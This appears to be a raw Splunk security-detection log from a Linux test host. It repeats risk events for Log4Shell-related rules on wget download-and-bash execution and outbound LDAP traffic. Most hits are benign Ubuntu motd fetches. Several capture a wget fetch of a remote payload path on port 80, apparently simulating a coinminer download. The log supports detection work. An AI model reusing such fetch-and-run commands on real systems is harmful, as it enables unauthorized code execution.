1642999416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642993441", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-24T03:04:01", parent_process_id="18830", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="18874", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642999416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642993441", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-24T03:04:01", parent_process_id="18830", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="18874", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="root", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642967015, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642962361", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-23T18:26:01", parent_process_id="18000", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="18038", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642967015, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642962361", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-23T18:26:01", parent_process_id="18000", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="18038", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="root", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642877016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642870681", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-22T16:58:01", parent_process_id="15155", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="15195", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642877016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642870681", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-22T16:58:01", parent_process_id="15155", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="15195", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="root", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642776216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642772581", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-21T13:43:01", parent_process_id="12336", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="12375", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642776216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642772581", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-21T13:43:01", parent_process_id="12336", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="12375", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="root", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642733016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642729148", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-21T01:39:08", parent_process_id="11090", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="11128", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642733016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642729148", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-21T01:39:08", parent_process_id="11090", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="11128", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="root", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642725815, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642719022", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T22:50:22", parent_process_id="10827", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="10829", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642725815, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642719022", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T22:50:22", parent_process_id="10827", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="10829", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642723157, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Command and Control", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="PR.PT", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="T1190", annotations._all="T1059", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-20T22:46:56", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T22:49:21", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642723157, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Command and Control", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="PR.PT", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="T1190", annotations._all="T1059", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-20T22:46:56", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T22:49:21", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642722216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642718946", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T22:49:06", parent_process_id="10815", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="10816", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642722216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", 